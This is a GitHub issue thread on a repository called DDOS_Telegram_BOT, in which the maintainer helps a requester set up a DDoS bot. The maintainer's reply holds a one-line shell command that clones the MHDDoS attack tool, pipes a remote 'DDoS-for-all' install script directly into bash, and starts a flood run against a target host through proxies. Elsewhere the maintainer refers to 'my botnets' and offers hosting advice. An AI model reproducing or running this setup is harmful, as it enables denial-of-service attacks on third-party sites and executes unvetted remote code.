### ISSUE TITLE
How do you run to contact me and I will inbox you

### ISSUE THREAD

**Issue by 0956Tricker** [Mehliug-git/DDOS_Telegram_BOT#1]
How do you run to contact me and I will inbox you

**Comment by Mehliug-git** [comment]
Re Fork my work, if you want tu run it, Because the code you have in your repo is no longer up to date for a long time

**Comment by 0956Tricker** [comment]
![Screenshot_20230606-173837](https://github.com/Mehliug-git/DDOS_Telegram_BOT/assets/111101267/12d70357-e38f-4613-896b-dc8703edbfa5)
Do you have to enter the token here with your name here?

**Comment by Mehliug-git** [comment]
No, just make a .env file like this :

TELEGRAM_TOKEN=PASTE_YOUR_TELEGRAM_TOKEN_HERE
NUM=CHOOSE_A_NAME_FOR_THE_BOT

and paste this command into the shell :

/usr/bin/python3 -m pip install --upgrade pip && pip3 uninstall telegram && pip3 uninstall telegram-bot python-telegram-bot && pip3 install -r requirements.txt &&git clone https://github.com/MatrixTM/MHDDoS.git && cd MHDDoS && pip3 install -r requirements.txt && curl -s https://raw.githubusercontent.com/SlavaUkraineSince1991/DDoS-for-all/main/scripts/python_git_MHDDoS_proxy_install.sh | bash && python3 ~/MHDDoS/start.py GET example.com 1 100 mhddos_proxy/list 100 5

**Comment by Mehliug-git** [comment]
Yes, you can do it.

No, if you want to use my botnets for personal uses just build your own server.

I tried my procedure and it works, just read the README.md file or change your hosting server (GLITCH is free and work like a charm)

**Comment by Mehliug-git** [comment]
And make a pip3 install re

sorry for the miss in requirements.txt

**Comment by 0956Tricker** [comment]
i want to use yours give me bot link

**Comment by Mehliug-git** [comment]
No little h4x0r.

Just learn by yourself.

If you have no more questions I close this Issue

**Comment by 0956Tricker** [comment]
Do you have a video on how to install ddos bot?

**Comment by Mehliug-git** [comment]
Nope sorry, 

Send me your step for install and I look it 

What is your host ?
